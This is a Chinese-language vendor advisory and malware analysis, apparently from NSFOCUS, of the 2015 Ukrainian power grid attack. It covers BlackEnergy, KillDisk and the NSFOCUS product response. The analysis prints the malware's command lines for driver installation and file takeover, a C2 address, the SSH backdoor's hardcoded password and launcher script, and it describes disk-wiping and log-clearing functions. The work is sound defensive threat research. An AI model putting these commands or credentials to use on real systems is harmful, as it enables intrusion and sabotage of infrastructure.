2015年12月,乌克兰电力公司设备遭到黑客攻击,并导致大规模停电事件,已引起公众极大的恐慌。本文对该事件相关信息及核心样本进行了分析及验证,并给出应对方案。

乌克兰电力公司设备被攻击事件

2016年1月4日,ESET公司发表文章称,乌克兰境内的多家配电公司设备中监测到的KillDisk,由此怀疑使用了BlackEnergy后门,攻击者能够利用它来远程访问并控制电力控制系统。由于此事件是针对电力设备的攻击,对于国家关键基础设施的安全性具有非比寻常的意义,故存在巨大的风险。相关情况如下:

事件基本情况

攻击的基本过程

本次攻击主要针对乌克兰电力部门,攻击者以钓鱼邮件方式,附带木马XLS文件,诱惑用户打开这个文件,从而运行木马,安装SSH后门,以便攻击者可以针对目标下发工业控制指令,必要时运行killdisk进行系统自毁,延长系统恢复时间。

危害和影响分析

BlackEnergy技术发展

图1 BlackEnergy技术发展(图片来自F-Secure BlackEnergy whitepaper)

国内可能遭遇的危害

之所以发生此次事件,是由于国外的电力设备有相当一部分都接入了互联网,攻击者得以通过邮件的形式诱骗工作人员,从而进入系统实施攻击。相比之下,国内大多工控设施及相关业务系统都采用了专网的形式或者与互联网隔绝,这在相当程度上阻止了此类事件的发生,但需要注意的是,在绿盟科技长年对于工控安全的研究中发现,移动存储设备时常成为木马入侵的途径之一,如果BlackEnergy木马通过这种形式感染业务系统设备后,完全有可能通过预置的攻击方案,对工控系统实施打击,比如利用KillDisk损毁主机,这样控制系统重启过程中一旦无法读取配置,将导致整个系统停机。

事件防护方案

本次攻击主要以邮件方式传播木马XLS文件,利用社会工程学,诱惑被攻击者打开文件,运行木马,安装SSH后门,保证攻击者可以长时间控制被感染的主机。针对目标下发工业控制指令,必要时运行killdisk进行系统自毁,延长系统恢复时间。

基于目前绿盟科技工控系统安全专家的分析情况来看,已经启动了一套应对方案,随时可以帮助客户应对该事件,避免造成更大的风险和损失,这些方案包括:

产品自动升级服务

绿盟入侵防护系统(NSFOCUS NIPS)将在2016年1月16日发布产品规则升级包,包括567、568、569版本,用户升级后即可提供实时防护。

升级办法 绿盟科技已在软件升级公告中提供规则升级包,规则可以通过产品界面的在线升级进行。如果您的业务系统暂时还无法升级规则包,那么可以在软件升级页面中,找到对应的产品,通过下载升级包,以离线方式进行升级。相关升级信息请随时关注:

极光自助扫描服务

绿盟远程安全评估系统(RSAS)通过绿盟云也交付了云端自助扫描服务(极光自助扫描服务),用户可以通过该服务的资产管理功能定期对主机设备进行漏洞检查,以便对多种漏洞进行风险监测,发现内网中交换路由设备上存在的安全漏洞。

登录24小时在线极光自助扫描页面,随时申请,随时试用,随时检查,申请链接如下:

https://cloud.nsfocus.com/#/krosa/views/initcdr/productandservice?pid=1&sid=0&cid=1

反垃圾邮件服务

针对此次事件中以钓鱼邮件入侵的手段,还可以申请试用反垃圾邮件服务,通过这项服务用户可以对电子邮件系统进行全面安全防御,申请链接如下:

https://cloud.nsfocus.com/#/krosa/views/initcdr/productandservice?pid=1&sid=0&cid=1

专家团队检测服务

1) 绿盟科技工程师前往客户现场检测。

2) 使用绿盟科技的工控漏扫定期对主机进行漏洞检测。

木马专杀解决方案

1) 短期服务:绿盟科技工程师现场木马后门清理服务(人工服务 NIPS TAC)。确保第一时间消除网络内相关风险点,控制事件影响范围,提供事件分析报告。

2) 中期服务:提供3-6个月的风险监控与巡检服务(NIPS TAC 人工服务)。根除风险,确保事件不复发。

3) 长期服务:能源行业业务风险解决方案(威胁情报 攻击溯源 专业安全服务 行业工控安全解决方案)

在绿盟科技制定应对方案的同时,为了帮助用户能够对此次攻击事件有更深入的了解,绿盟科技工控安全专家联合威胁响应中心的技术专家,对事件涉及的木马进行了深入分析。

BlackEnergy木马分析

该样本是一个复合样本,包含多个文件。下面绿盟科技的工程师模拟重现这个分析过程。

执行架构

样本的执行架构图如下所示:

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(1)

执行架构

样本的启动方式

样本结构

该样本是一个复合型样本,包含多个文件。

表1 各个文件的基本信息介绍

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(2)

复合型样本

详细文件功能

XLS

MD5: 97b7577d13cf5e3bf39cbe6d3f0a7732

主要功能:释放C:\Users\Dell\AppData\Local\Temp\vba_macro.exe文件, 并启动执行。

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(3)

XLS中的宏代码

vba_macro.exe

MD5: abeab18ebae2c3e445699d256d5f5fb1

FONTCACHE.DAT

MD5: cdfb4cda9144d01fb26b5449f9d189ff

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(4)

RPC通道监听

首先对svchost.exe进行代码注入:

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(5)

svchost.exe进程中注入的代码

注入的代码的主要功能是调用iexplore.exe进程。

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(6)

svchost.exe创建iexplore.exe进程

Iexplore.exe有网络请求,网址已经失效,所以,请求失败。

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(7)

explore.exe的网络操作

Droper2.exe

MD5: 1d6d926f9287b4e4cb5bfc271a164f51

文件名:C:\Windows\system32\drivers\adpu320.sys(e60854c96fab23f2c857dd6eb745961c)并加载执行。adpu320.sys文件名是随机生成的。

加载方式为:

12345使用函数:CreateProcessA参数:ModuleFileName="C:\Windows\system32\cmd.exe",CommandLine="/c "ping localhost-n8&move/Y"C:\Windows\adpu320s""C:\Windows\system32\drivers\adpu320.sys"&ping localhost-n3&net start adpu320""。

user32.dll.mui中保存了系统的版本与水印信息。

123456789获取文件所有权使用函数:CreateProcessA参数:CommandLine="C:\Windows\system32\cmd.exe /c C:\Windows\System32\takeown.exe /f "C:\Windows\System32\zh-CN\user32.dll.mui""恢复文件所有权使用函数:CreateProcessA参数:ModuleFileName=NULL0018EF440018EF74|CommandLine="C:\Windows\system32\cmd.exe /c "C:\Windows\System32\icacls.exeC:\Windows\System32\zh-CN\user32.dll.mui/grant%username%:F""

注入代码主要用于两个方面,1网络连接,地址: 5.9.32.230:443;2对文件Ntkrnlpa.exe进行写入操作,用于对释放的驱动程序进行保护。

通过绿盟科技翠鸟软件行为分析系统Kingfisher中,可以看到该文件的执行流程图如下所示:

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(8)

Droper2.exe的执行过程

Driver.sys

驱动文件分32bit和64bit两类,执行的基本功能相同。

驱动程序MD5列表

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(9)

驱动程序MD5列表

驱动文件主要用于代码注入,其注入代码完成与C&C服务器通信。

SSH_Backdoor.exe(dropbear.exe)

MD5: fffeaba10fd83c59c28f025c99d063f8

功能:这个文件是一个SSH服务器程序,是从现有的第三方SSH服务端dropbear的代码修改的。使用了内置的默认密码(passDs5Bu9Te7)进行登录验证。

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(10)

SSH服务器密码校验代码

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(11)

SSH服务器程序的RSA认证密钥

该文件是由一段Shell脚本启动的:

1234Set WshShell=CreateObject("WScript.Shell")WshShell.CurrentDirectory="C:\WINDOWS\TEMP\Dropbear\" WshShell.Run "dropbear.exe-rrsa-ddss-a-p6789",0,false

Killdisk组件

文件1:72bd40cd60769baffd412b84acc03372(MD5)

以服务启动,创建C:\Windows\svchost.exe文件,将自己的代码写入到该文件中,然后将该文件作为服务启动。启动过程可以设置不同的参数,实现不同的功能。

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(12)

以服务形式启动该文件的代码片段

以服务形式启动该文件的代码片段

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(13)

枚举系统进程并提升进程权限

枚举系统进程并提升进程权限

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(14)

设置系统注册表配置项代码片段

设置系统注册表配置项代码片段

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(15)

获取关机权限代码片段

获取关机权限代码片段

文件2: 7361b64ddca90a1a1de43185bd509b64(MD5)

该文件主要用于获取系统权限与清除系统日志。

获取的权限包括:

123456789101112131415SE_SECURITY_PRIVILEGESE_BACKUP_PRIVILEGESE_RESTORE_PRIVILEGESE_SYSTEMTIME_PRIVILEGESE_SHUTDOWN_PRIVILEGESE_REMOTE_SHUTDOWN_PRIVILEGESE_TAKE_OWNERSHIP_PRIVILEGESE_SYSTEM_ENVIRONMENT_PRIVILEGESE_SYSTEM_PROFILE_PRIVILEGESE_PROF_SINGLE_PROCESS_PRIVILEGESE_INC_BASE_PRIORITY_PRIVILEGESE_CREATE_PAGEFILE_PRIVILEGESE_INCREASE_QUOTA_PRIVILEGESE_MANAGE_VOLUME_PRIVILEGE

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(16)

提升进程权限代码片段

提升进程权限代码片段

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(17)

清除日志代码片段

清除日志代码片段

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(18)

API编码代码片段

API编码代码片段

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(19)

初始化安全描述符代码片段

初始化安全描述符代码片段

文件3: cd1aa880f30f9b8bb6cf4d4f9e41ddf4

该文件主要用于对硬盘设备PhysicalDrive%Num%(Num从0到10)进行清零。

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(20)

硬盘清零代码片段

硬盘清零代码片段

文件4: 66676deaa9dfe98f8497392064aefbab

添加了对多种文件类型的处理。

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(21)

部分文件类型列表

部分文件类型列表

木马行为分析及攻击定位

行为分析

文件分析

进程分析

网络分析

注册表分析

攻击定位

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(22)

各个IP地址定位信息

各个IP地址定位信息

利用技术跟踪

威胁情报

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(23)

威胁情报

威胁情报的获取及响应都体现了防御能力的建设程度,威胁情报服务体系至少包含了威胁监测及响应、数据分析及整理、业务情报及交付、风险评估及咨询、安全托管及应用等各个方面,涉及研究、产品、服务、运营及营销的各个环节,绿盟科技通过研究、云端、产品、服务等立体的应急响应体系,向企业和组织及时提供威胁情报,并持续对对匿名者攻击事件进行关注,保障客户业务的顺畅运行。

如果您对我们提供的内容有任何疑问,或者需要了解更多的信息,可以随时通过在微博、微信中搜索绿盟科技联系我们,欢迎您的垂询!

关于绿盟科技

电力网络攻击事件(乌克兰电力攻击事件分析及防护方案)(24)

绿盟科技

北京神州绿盟信息安全科技股份有限公司(简称绿盟科技)成立于2000年4月,总部位于北京。在国内外设有30多个分支机构,为政府、运营商、金融、能源、互联网以及教育、医疗等行业用户,提供具有核心竞争力的安全产品及解决方案,帮助客户实现业务的安全顺畅运行。

基于多年的安全攻防研究,绿盟科技在网络及终端安全、互联网基础安全、合规及安全管理等领域,为客户提供入侵检测/防护、抗拒绝服务攻击、远程安全评估以及Web安全防护等产品以及专业安全服务。

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市交易,股票简称:绿盟科技,股票代码:300369。

如需下载完整版: 参见绿盟博客

如果您需要了解更多内容,可以

加入QQ群:486207500

,